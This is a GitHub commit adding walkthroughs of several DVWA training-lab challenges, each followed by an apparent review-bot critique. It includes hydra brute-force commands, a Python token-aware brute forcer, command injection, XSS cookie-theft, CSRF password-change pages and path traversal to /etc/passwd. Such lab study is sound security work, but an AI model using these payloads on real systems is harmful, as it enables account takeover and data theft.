add files
Aftab700 committed Feb 5, 2024
1 parent 9ef0a93 commit d57f8cc
Showing 13 changed files with 935 additions and 0 deletions.
143 changes: 143 additions & 0 deletions Brute_Force.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,143 @@
# Brute Force


The goal is to brute force an HTTP login page.

**Security level is currently: low.**

On submitting the username and password we see that it is using get request

<img width="477" alt="image" src="https://user-images.githubusercontent.com/79740895/185153021-af373095-102b-4d68-88c7-573499351bc5.png">

So let’s use hydra for brute force:

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
```

Here we are using cookies because if we are not authenticated when we make the login attempts, we will be redirected to default login page.

<!-- {::options parse_block_html="true" /} -->

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
┌─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-17 23:50:56
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get-form://127.0.0.1:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346
[80][http-get-form] host: 127.0.0.1 login: admin password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-17 23:51:59

```

</details>

<!-- {::options parse_block_html="false" /} -->

Login credentials found by hydra:
`admin:password`

<br/>

**Security level is currently: medium.**


It is still using get request.

so lets use hydra again:
```
hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium'
```
it still work but this time attack takes significantly longer then before.

on analyzing the login functionality we notice that the response is delayed by 2 or 3 seconds on wrong attempt.

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
┌─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-18 09:17:45
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get-form://127.0.0.1:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium
[80][http-get-form] host: 127.0.0.1 login: admin password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-18 09:18:50

```

</details>

<br/>

**Security level is currently: high.**

It's still get request but this time one additional parameter `user_token`

It's using CSRF token so hydra wont help, let's use python this time.

<details><summary markdown="span">Click to see python code :diamond_shape_with_a_dot_inside: </summary>

```python
import requests
from bs4 import BeautifulSoup
from requests.structures import CaseInsensitiveDict

url = 'http://127.0.0.1/vulnerabilities/brute/'

headers = CaseInsensitiveDict()
headers["Cookie"] = "security=high; PHPSESSID=j422143437vlsdgqs0t1385420"

r = requests.get(url, headers=headers)

r1 = r.content
soup = BeautifulSoup(r1, 'html.parser')
user_token = soup.findAll('input', attrs={'name': 'user_token'})[0]['value']

with open("/usr/share/wordlists/rockyou.txt", 'rb') as f:
for i in f.readlines():
i = i[:-1]
try:
a1 = i.decode()
except UnicodeDecodeError:
print(f'can`t decode {i}')
continue

r = requests.get(
f'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={a1}&Login=Login&user_token={user_token}#',
headers=headers)
r1 = r.content
soup1 = BeautifulSoup(r1, 'html.parser')
user_token = soup1.findAll('input', attrs={'name': 'user_token'})[0]['value']
print(f'checking {a1}')
if 'Welcome' in r.text:
print(f'LoggedIn: username: admin , password:{a1} ===found===')
break
```

</details>

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
┌─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $python brute_high.py
checking 123456
checking 12345
checking 123456789
checking password
LoggedIn: username: admin , password:password ===found===
```

</details>

<br/>
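Review bot: the high-level script interpolates each candidate password straight into the query string (`f'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={a1}&Login=Login&user_token={user_token}#'`), so any rockyou entry containing `&`, `#`, `%`, `+` or a space is mangled before it reaches the server and those candidates are silently never tested; pass the fields as a `params=` dict to `requests.get` so they are URL-encoded. While there, `f.readlines()` loads the whole wordlist into memory where `for i in f:` would stream it, `findAll` is the deprecated spelling of `find_all`, and both hydra invocations hard-code a `PHPSESSID` that stops working once that session expires, which deserves a sentence since the text already explains the cookie is needed to avoid the login redirect. Wording: "takes significantly longer then before" should be "than", and "it still work" / "hydra wont help" need "works" / "won't".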
24 changes: 24 additions & 0 deletions Command_Injection.md
@@ -0,0 +1,24 @@
# Command Injection

<img width="467" alt="image" src="https://user-images.githubusercontent.com/79740895/185295923-7a149c9d-8f1e-4262-ae0a-3884514462ac.png">

we are given with functionality to ping device. we give ip or domain to ping:

input: localhost

output:

<img width="463" alt="image" src="https://user-images.githubusercontent.com/79740895/185296846-d2795040-d782-4d85-af22-5197875b0f91.png">

This is about command injection so backend must be appending our input ping command.

we can give our arbitrary command to execute with the help of pipe `|` ,so let's create a simple payload :
```
|ls
```

<img width="467" alt="image" src="https://user-images.githubusercontent.com/79740895/185297755-e48d1fc7-cccd-4a81-acf3-3558ffb70366.png">

_it works on all low, medium and high_

<br/>
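Review bot: the closing line "it works on all low, medium and high" asserts the bypass without showing what medium and high filter, so a reader cannot tell whether `|ls` succeeds because no filtering exists or because the filter misses this exact form; put the relevant blacklist lines from each level's source next to the payload and say why a bare `|` survives where other separators would not. Also describe in text what the screenshot after `|ls` shows (a directory listing of the web root), since the image is the only evidence that the command ran. Wording: "we are given with functionality to ping device" and "appending our input ping command" should read "we are given a ping function" and "appending our input to a ping command".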
28 changes: 28 additions & 0 deletions Content_Security_Policy_(CSP)_Bypass.md
@@ -0,0 +1,28 @@
# Content Security Policy (CSP) Bypass



**Security level is currently: low.**

from CSP we can import script from pastebin.com, so let's put our script on pastebin and include that link:

payload=`https://pastebin.com/dl/Lnamji4V`

this JavaScript is executed on page.


**Security level is currently: medium.**

It's using nonce to prevent execution of JavaScript includ but this value is static so we can add this to our payload:

nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=

payload=`<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(document.cookie)</script>`

**Security level is currently: high.**

It is making request to `http://192.168.170.131/vulnerabilities/csp/source/jsonp.php?callback=solveSum` to solve this lab we have to intercept this request
and anything we set to callback's value wil be executed so we can modify it to `callback=alert(document.cookie);` and alert will pop up.


<br/>
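Review bot: the medium section rests on "this value is static" but never says where the nonce was observed (the `Content-Security-Policy` response header and the page's own `<script nonce=...>` tags); add that, plus the one-line takeaway that a nonce only protects anything if it is unpredictable and regenerated per response, otherwise it is a reusable password for the policy. In the high section, "we have to intercept this request ... and anything we set to callback's value wil be executed" only alters the tester's own request to `jsonp.php?callback=solveSum`, which demonstrates nothing a victim would ever hit; since the page already loads that endpoint from its own origin, show the bypass as a page-delivered `<script src="/vulnerabilities/csp/source/jsonp.php?callback=alert(document.cookie)"></script>` instead. For the low section, the pastebin link is the only record of the payload and will go stale; inline the script body that `https://pastebin.com/dl/Lnamji4V` served. Typos: "includ", "wil".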
104 changes: 104 additions & 0 deletions Cross_Site_Request_Forgery_(CSRF).md
@@ -0,0 +1,104 @@
# Cross Site Request Forgery (CSRF)

**Security level is currently: low.**

<img width="827" alt="image" src="https://user-images.githubusercontent.com/79740895/185393318-096ce7f2-f881-4aee-ba63-1a6c2074fb52.png">

Here we can change password, there is no csrf protection. We can create simple form to auto submit and change password of victim.

<details><summary markdown="span">Click to see html code for CSRF :diamond_shape_with_a_dot_inside: </summary>

```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.170.131/vulnerabilities/csrf/">
<input type="hidden" name="password&#95;new" value="pass" />
<input type="hidden" name="password&#95;conf" value="pass" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

</details>

we can host this page so when victim visit page their password will automatically change.

I'm using python to host webpage:

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
C:\Users\AFTAB SAMA\Downloads>python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:192.168.173.222 - - [18/Aug/2022 18:03:11] "GET /csrf-test.html HTTP/1.1" 200 -
::ffff:192.168.173.222 - - [18/Aug/2022 18:03:12] code 404, message File not found
::ffff:192.168.173.222 - - [18/Aug/2022 18:03:12] "GET /favicon.ico HTTP/1.1" 404 -
```

</details>



**Security level is currently: medium.**

Same attack won't work, looking at sourcecode we know that server checks where the request came from.

<img width="333" alt="image" src="https://user-images.githubusercontent.com/79740895/185403021-db671fc3-c08d-47e2-8a8f-fdb639e50e90.png">

one way to get around is if we can upload our file in server.

Now first of all change csrf.html into csrf.php file, then set low security level and switch into file uploading vulnerability inside DVWA.

Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.

<img width="468" alt="image" src="https://user-images.githubusercontent.com/79740895/185402657-d1e47dc3-2884-4619-a5a6-5dafbe459a68.png">

now we can use this new url: `http://192.168.170.131/hackable/uploads/csrf.php`

password changed.



**Security level is currently: high.**

This time it use csrf token. we can read this token if we have same origin and we can do that by uploading our payload to server as shown previously.

upload this code to server:

<details><summary markdown="span">Click to see code :diamond_shape_with_a_dot_inside: </summary>

```html
<html>
<body>
<p>TOTALLY LEGITIMATE AND SAFE WEBSITE </p>
<iframe id="myFrame" src="http://192.168.170.131/vulnerabilities/csrf" style="visibility: hidden;" onload="maliciousPayload()"></iframe>
<script>
function maliciousPayload() {
console.log("start");
var iframe = document.getElementById("myFrame");
var doc = iframe.contentDocument || iframe.contentWindow.document;
var token = doc.getElementsByName("user_token")[0].value;
const http = new XMLHttpRequest();
const url = "http://192.168.170.131/vulnerabilities/csrf/?password_new=hackerman&password_conf=hackerman&Change=Change&user_token="+token+"#";
http.open("GET", url);
http.send();
console.log("password changed");
}
</script>
</body>
</html>
```

</details>

on visiting this url it will read token from DOM and create password change request to server.

<img width="478" alt="image" src="https://user-images.githubusercontent.com/79740895/185408922-c1d9e774-3e43-4170-bcda-3c0269fc6260.png">

<br/>
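Review bot: the medium section says the server "checks where the request came from" and points at a screenshot, but never states the check in text, so the reason the uploaded `csrf.php` passes is left to the reader; write the condition out (presumably the `Referer` header having to contain the server's host) and say explicitly that medium and high are only defeated here by chaining the separate file upload vulnerability, which is the real finding. In the high payload, `iframe.contentDocument` is readable only because the page is served from the same origin as `/vulnerabilities/csrf`; that is the whole reason the upload step is needed and deserves a sentence. Minor: the low PoC's `<script>history.pushState('', '', '/')</script>` is proxy-generator boilerplate that plays no part in the attack and can go, and the high-level change is issued as a GET (`?password_new=hackerman&password_conf=hackerman&Change=Change&user_token=...`), worth calling out since the new password then also lands in server logs.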
29 changes: 29 additions & 0 deletions DOM_Based_Cross_Site_Scripting_(XSS).md
@@ -0,0 +1,29 @@
# DOM Based Cross Site Scripting (XSS)


**Security level is currently: low.**


We have option to select language and value is reflected in GET parameter default=English

payload=`<script>alert(document.cookie);</script>`

using this it will trigger an alert pop up with cookie values.


**Security level is currently: medium.**

we are stuck inside option tag so we have escape that and we can't use script tag because that is blocked so we use image tag.

payload=`" ></option></select><img src=x onerror="alert(document.cookie)">`


**Security level is currently: high.**

This time server is using whitelist we can bypass that by puting our payload after `#` because anything after `#` is not sent to
server but still reflecting on the page.

payload=`#<script>alert(document.cookie);</script>`


<br/>
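Review bot: the high-level payload is shown as `#<script>alert(document.cookie);</script>` with no surrounding URL, so it is unclear that the fragment must follow a value the server-side whitelist accepts (e.g. `?default=English#<script>alert(document.cookie);</script>`); show the full URL and explain why the fragment is rendered at all: the page's client-side script reads the `default` value out of `document.location`, which includes the fragment, and writes it into the DOM, while the server only ever sees `default=English`. That same mechanism is what "value is reflected in GET parameter default=English" in the low section describes, which currently reads as if the server reflects it. For medium, quote what is actually blocked (the text only says the script tag "is blocked") so the switch to `<img src=x onerror=...>` and the `"></option></select>` breakout are motivated. Typo: "puting".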
28 changes: 28 additions & 0 deletions File_Inclusion.md
@@ -0,0 +1,28 @@
# File Inclusion

**Security level is currently: low.**

In url there is GET parameter `page` used for including file.

url:`http://192.168.170.131/vulnerabilities/fi/?page=include.php`

By changing this file location we can read file on server.

url:`http://192.168.170.131/vulnerabilities/fi/?page=/etc/passwd`

<img width="658" alt="image" src="https://user-images.githubusercontent.com/79740895/185410392-bf62fdae-c6c7-4f90-a934-191ffadcf471.png">


_Also work for medium_

**Security level is currently: high.**

we have one condition that file name should start with `file`.

<img width="343" alt="image" src="https://user-images.githubusercontent.com/79740895/185414371-f1a0cb44-0688-40ab-ae49-1c623e19744f.png">

we can bypass that with payload:`file/../../../../../../etc/passwd` path traversal.

<img width="456" alt="image" src="https://user-images.githubusercontent.com/79740895/185414731-fda51955-9d13-4b60-893a-f700f29021eb.png">

<br/>
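Review bot: the high-level condition "file name should start with `file`" exists only as a screenshot; put the actual check in text so readers can see it is a prefix match rather than a path check, and explain why `file/../../../../../../etc/passwd` still resolves (the prefix is satisfied by a leading component that the `..` segments then discard before the include happens). "Also work for medium" needs a sentence on why the unchanged `/etc/passwd` survives that level: medium is where traversal filtering is normally introduced, and an absolute path containing no `../` is precisely what such a filter misses; without that sentence the jump from medium to high reads as if nothing changed. Minor: "we can read file on server" should say "any file the web server process can read".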
0 comments on commit d57f8cc